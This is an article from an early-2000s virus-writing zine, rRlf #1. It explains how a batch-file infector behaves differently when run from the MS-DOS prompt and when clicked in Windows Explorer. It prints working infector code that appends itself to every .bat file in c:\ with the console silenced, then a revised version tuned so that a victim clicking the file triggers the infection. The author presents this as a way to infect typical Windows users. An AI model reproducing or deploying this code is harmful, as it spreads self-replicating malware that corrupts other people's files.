<html>
<head>
<title>rRlf #1</title>
</head>
<body text="#000000" link="#ff0000" vlink="#ff0000" alink="#ff0000" background="background.jpg">
<center>
<img src="logo.jpg">
<br><i>When the going gets weird the weird turn pro</i>
<br><table cellpadding="9">
<tr>
<th><a href="23.html">last article</a></th>
<th><a href="01.html">table of contents</a></th>
<th><a href="25.html">next article</a></th>
</tr>
</table>
</center>
<p><b><u>Strange Article - Difference between executing batch files in MS-DOS prompt and in Windows Explorer by Alco paul</u></b>
<p>I just discovered this difference when I was testing the spawning process of my batch worm, Redirection...
<p>Ei, a boring afternoon, nothing to do, can't code in any programming languages coz you're still learning how to, planned to write a batch file infector...
<br>Type, takataktak, enter...
<p>***************************
<br>c:\>copy con infector.bat
<br>@echo off
<br>ctty nul
<br>copy c:\*.bat+%0.bat
<br>exit
<br>^Z
<br>***************************
<p>Explanation:
<p>**************************
<br>c:\>copy con infector.bat ----> make our batch file
<br>@echo off ----> turn the console output off and redirect it to null to prevent user interactions
<br>ctty nul
<br>copy c:\*.bat+%0.bat ----> copy the running batch file to all the batch files in c:\
<br>exit -----> terminate the process
<br>^Z -----> write file to disk
<br>**************************
<p>************************************************************
<br>%0.bat is similar to App.EXEName & ".exe" in Visual Basic...
<br>************************************************************
<p>Running infector.bat in MS-DOS prompt will produce our desired result.
<br>It will copy itself to all the batch files in c:\
<p>:)
<p>But when it's run in Windows Explorer, by clicking the icon of infector.bat, it won't copy itself to c:\*.bat
<p>:(
<p>Why?
<br>&nbsp;
<br>&nbsp;
<br>Let's examine...
<p>*********************
<br>c:\>copy con bug.bat
<br>copy c:\*.bat+%0.bat
<br>^Z
<br>*********************
<p>Let's not include @echo off and ctty nul to see what's happening to bug.bat while it executes..
<p>Click Explorer.. Type c:\ in the address bar and click Go...
<p>It'll display the icons of all the files in c:\.. Click bug and see what'll happen..
<p>------------------------------------------------
<br>Finished - bug
<br>------------------------------------------------
<br>C:\>copy c:\*.bat+C:\BUG.BAT.bat
<br>c:\h.bat
<br>C:\BUG.BAT.bat
<br>File not found - C:\BUG.BAT.bat
<br>Content of destination lost before copy
<br>Content of destination lost before copy
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0 file(s) copied
<br>&nbsp;
<br>&nbsp;
<br>C:\>
<br>------------------------------------------------
<p>{!} Surely, no files will be copied to c:\*.bat because BUG.BAT.bat doesn't exist...
<br>When clicking, Windows Explorer adds another extension to our file bug.bat making it bug.bat.bat and executes bug.bat.bat....
<br>Ask Microsoft why..
<p>To fix the problem, instead of %0.bat, make it %0
<p>***************************
<br>c:\>copy con infector.bat
<br>@echo off
<br>ctty nul
<br>copy c:\*.bat+%0
<br>exit
<br>^Z
<br>***************************
<p>Go to Windows Explorer, click infector.bat and we'll achieve our desired goal, infecting all the batch files in c:\
<p>The drawback, you won't be able to infect c:\*.bat when you run the modified infector.bat in MS-DOS prompt...
<p>But remember this, NO Windows User will think of executing a file in MS-DOS prompt.....
<p>Think.. :) 
<br>&nbsp;
<br>&nbsp;
<br>&nbsp;
<br>Alcopaul
<br>&nbsp;
<br>&nbsp;
<br>12/19/2001
<br>&nbsp;
<br>&nbsp;
Bugs found? Email me.
</body>
</html>
